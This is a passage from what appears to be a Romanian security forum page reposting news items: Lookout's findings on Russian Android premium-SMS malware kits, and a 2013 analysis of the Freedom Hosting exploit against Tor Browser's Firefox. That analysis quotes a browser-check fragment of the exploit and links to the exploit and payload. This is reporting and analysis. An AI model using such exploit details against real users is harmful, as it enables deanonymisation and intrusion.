Bridger for the murders of Tia Sharp and April Jones. Both Hazell and Bridger were known to have sought out and viewed child abuse images online. The IWF said the Hazell and Bridger cases had led to a 42% increase in the number of reports it had received in the past three months, compared with the same period last year. In June, representatives of a number of internet companies, including Google, Microsoft and Twitter, were summoned to a meeting in Whitehall by Culture Secretary Maria Miller and urged to do more to clamp down on child abuse images on the web. Sursa TheRegister.co.uk

DIY SMS-scam kits anyone can use - even your grandparents! Just 10 professionally run malware-making workshops in Russia are responsible for 30 per cent of the Trojans, spyware and other nasties infecting smartphones globally. That's according to a study by mobile security outfit Lookout. These underground crime labs churn out DIY kits ideal for scriptkiddies looking to make a fast buck: the tools can be used to distribute malware and earn money from it with little or no coding experience or hacking skills. Once installed on a device, the malware is typically disguised as a legit, popular app and secretly texts premium-rate numbers, thus racking up charges on the victims' phone bill. The Russian development centres are skilled at releasing new Android builds and configurations of their code every two weeks; organising hosting for the malware; registering short-code phone numbers that victims' mobes text; and creating marketing campaign management tools — the malware developers' customers get paid for marketing and distributing the bogus apps. These affiliates customise their copy of the malware to make it look like the latest Angry Birds or Skype utility, for example. Then they use social networks, such as Twitter, to draw people into downloading the booby-trapped software. Almost all the malware targets Android smartphones. "We reviewed 250,000 unique Twitter handles and of those, nearly 50,000 linked directly to these toll fraud campaigns," Lookout researcher Ryan Smith explained in a blog post. "The victim of the scheme is usually a Russian-speaking Android user looking for free apps, games, MP3s or pornography. "The victim may have been using search engine or click through links in tweets or mobile ads, then unwittingly download the malicious app which secretly adds a premium SMS charge to their phone bill." A research paper from Lookout on its Dragon Lady* investigation explains the malware creation centres have taken many ideas on how to run their businesses from legitimate small software houses. "Organised groups of Android malware authors are operating like startups: tapping multiple individuals or organisations for specialisation in different business areas, leveraging online tools for promotion and developing affiliate programs," the Lookout team explained. "We’ve seen evidence that these affiliate marketers have earned between $700/month to $12,000/month [£450/month to £7,800/month] from these scams, and estimate that there are thousands of individual distributors and potentially tens of thousands of affiliate websites promoting these custom SMS malware in the same manner as traditional affiliate web marketers." More than 50 per cent of Lookout’s total malware detections during the first half of 2013 were Russian-based toll fraud. And 60 per cent of this activity can be traced back to just 10 centres in Russia. Lookout has been actively tracking SMS fraud since the first example was found in the wild in August 2010. Lookout has been classifying Russian SMS-swindling malware in individual groups or “families” based on similarities in code and key features in the three years since. The data has also allowed the security biz to track individual malware families back to affiliates and the programmers' headquarters Sursa TheRegister.co.uk

Fake and gay. S-a facut destul tam-tam pe tema asta si nu cred ca mai are nevoie de asa ceva.

https://rstforums.com/forum/73395-almost-half-tor-sites-compromised-fbi-exclusive-details.rst

De 7 ani de cand e postul o fi invatat.

Asta ? Leadership Vizionar Cu NLP

As many of you might know the US has been pushing for the extradition of Eric Eoin Marques who an FBI agent has called as "the largest facilitator of child porn on the planet." But most of you might not know that he is also the owner of "freedom hosting" the largest hosting provider for .onion sites within the TOR network . This means that all the sites hosted by "freedom hosting" are at the hands of the FBI. As you can see from the above linked article freedom hosting has been accused of hosting child pornography for a very long time. I also have a fair idea on how the FBI did the "impossible", tracing a person who is using TOR.And they further might have found details on all the people visiting sites hosted by freedom hosting. First have a look at what a person posted on pastebin on Aug 3rd TOR/FREEDOM HOST COMPORMISED - Pastebin.com he says he found this code in the main page of "freedom host" this further links to this exploit Javascript Mozilla Pastebin - collaborative debugging tool . This is my analysis of the exploit ( I have not looked into it deeply as I am busy with my exams) 1. It is a 0 day for the Firefox version that comes as default with the "TOR Browser Bundle" 2. The code says "version >=17 && version <18" checks if the browser is the right version that the exploit works on . It also has an another check var i = navigator.userAgent.indexOf("Windows NT"); if (i != -1) return true; return false; 3.It also manages to gather the Real IP of the user and possibly execute a malicious payload that might give the attacker full access to the system. 4. This exploits works because the people at TOR project had made it such that Javascript is loaded by the built in browser by default (this was not the case before and people who had their "no script" plugin with proper setting "disallowed" are safe) 5.Please note that is NOT a zero day for the TOR network but rather an exploit for the Firefox version that most TOR users are running. Tor's official reply: https://blog.torproject.org/blog/hidden-services-current-events-and-freedom-hosting Though the action's done by the FBI to take down child pornography in the TOR network is appreciated by all of us, many of the legitimate sites hosted by freedom hosting are also down .They should make sure that what they do does not kill the freedom and anonymity that the TOR network stands for. Edit 1: Here are a few other deeper analysis I found --> http://pastebin.mozilla.org/2777139 , http://tsyrklevich.net/tbb_payload.txt Sursa EHackingNews.Com